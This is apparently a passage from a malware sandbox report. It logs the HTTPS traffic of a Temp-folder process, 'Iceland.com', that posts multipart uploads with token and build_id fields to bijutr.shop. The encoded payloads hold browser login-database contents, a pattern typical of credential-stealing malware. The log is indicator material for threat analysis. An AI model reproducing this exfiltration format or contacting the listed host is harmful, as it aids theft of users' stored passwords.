                                                                                                                                                                                                                                                              Data Ascii: ------VAIM7GLFCBIE3EUS00HLContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------VAIM7GLFCBIE3EUS00HLContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------VAIM7GLFCBIE3EUS00HLCont
                                                                                                                                                                                                                                                              2024-12-27 06:09:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:54 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:54 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:56 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              14192.168.2.449768188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----5PZCTJEC2VAAAAIE3W47
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 142457
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 4a 45 43 32 56 41 41 41 41 49 45 33 57 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 4a 45 43 32 56 41 41 41 41 49 45 33 57 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 4a 45 43 32 56 41 41 41 41 49 45 33 57 34 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------5PZCTJEC2VAAAAIE3W47Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------5PZCTJEC2VAAAAIE3W47Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------5PZCTJEC2VAAAAIE3W47Cont
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                              Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:56 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:58 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              15192.168.2.449769188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:58 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----I58QQIWLXBIM7Y5P8Q9R
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 493
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:58 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------I58QQIWLXBIM7Y5P8Q9RContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------I58QQIWLXBIM7Y5P8Q9RContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------I58QQIWLXBIM7Y5P8Q9RCont
                                                                                                                                                                                                                                                              2024-12-27 06:09:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:59 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              16192.168.2.449771188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----JMOPHD2DTRQIM7Q16X47
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 169765
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 44 32 44 54 52 51 49 4d 37 51 31 36 58 34 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------JMOPHD2DTRQIM7Q16X47Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------JMOPHD2DTRQIM7Q16X47Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------JMOPHD2DTRQIM7Q16X47Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
